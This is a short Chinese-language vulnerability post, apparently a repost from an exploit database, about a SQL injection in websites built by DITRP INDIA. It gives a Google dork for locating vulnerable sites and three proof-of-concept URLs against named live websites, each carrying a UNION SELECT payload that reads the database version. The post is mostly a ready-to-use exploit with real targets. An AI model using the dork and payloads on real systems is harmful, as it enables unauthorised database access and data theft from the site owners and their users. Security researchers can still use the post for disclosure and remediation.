DITRP INDIA网站SQL注入漏洞分析

本文详细分析了DITRP INDIA网站存在的SQL注入漏洞,包含漏洞发现过程、利用方法和测试环境信息。通过特定的Google Dork语法可发现易受攻击网站,漏洞允许攻击者执行恶意SQL查询获取数据库信息。

DITRP INDIA - SQL注入

2025.08.28 提交者:behrouz mansoori

风险等级: 中等

本地利用:

远程利用:

CVE:

CWE:

Dork: “designed by : DITRP INDIA”

#漏洞标题: DITRP INDIA - SQL注入 #日期: 2025-08-09 #漏洞作者: Behrouz Mansoori #Google Dork: “designed by : DITRP INDIA” #分类: 网页应用 #测试环境: Mac, Firefox

概念验证:

演示: 

1
2
3
4
5

https://dishapunjab.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

https://aarushcomputer.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

https://www.ishaqcomputers.co.in/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+

#发现者: Behrouz mansoori #Instagram: Behrouz_mansoori #邮箱: mr.mansoori@yahoo.com

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次